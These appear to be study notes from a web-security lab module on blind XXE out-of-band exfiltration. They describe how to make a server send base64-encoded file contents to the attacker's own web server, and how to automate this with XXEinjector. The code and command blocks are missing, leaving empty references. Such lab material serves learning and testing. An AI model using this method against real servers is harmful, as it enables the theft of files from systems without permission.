🐀Blind Data Exfiltration
Let's imagine we neither get the output of any of the XML entities nor do we get any PHP errors displayed.
Out-of-band Data Exfiltration*
Instead of having the web application output our file
entity to a specific XML entity, we will make the web application send a web request to our web server with the content of the file we are reading.
We will use a parameter entity for the content of the file we are reading while utilizing PHP filter to base64 encode it. Then, we will create another external parameter entity and reference it to our IP, and place the file
parameter value as part of the URL being requested over HTTP
And here is a PHP script (called index.php) to decode and output to the terminal ->
Then we run a PHP webserver:
Now we will simply add to our payload <root>&content;</root>
, which is needed to reference our entity and have it send the request to our machine with the file content
And once we send the request, we should see in our terminal ->
Automated OOB Exfiltration
We can use a tool like XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT
after it as a position locator for the tool
And the command we need to launch will be:
And the output will be displayed in a log file ->
Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
script.dtd ->
Last updated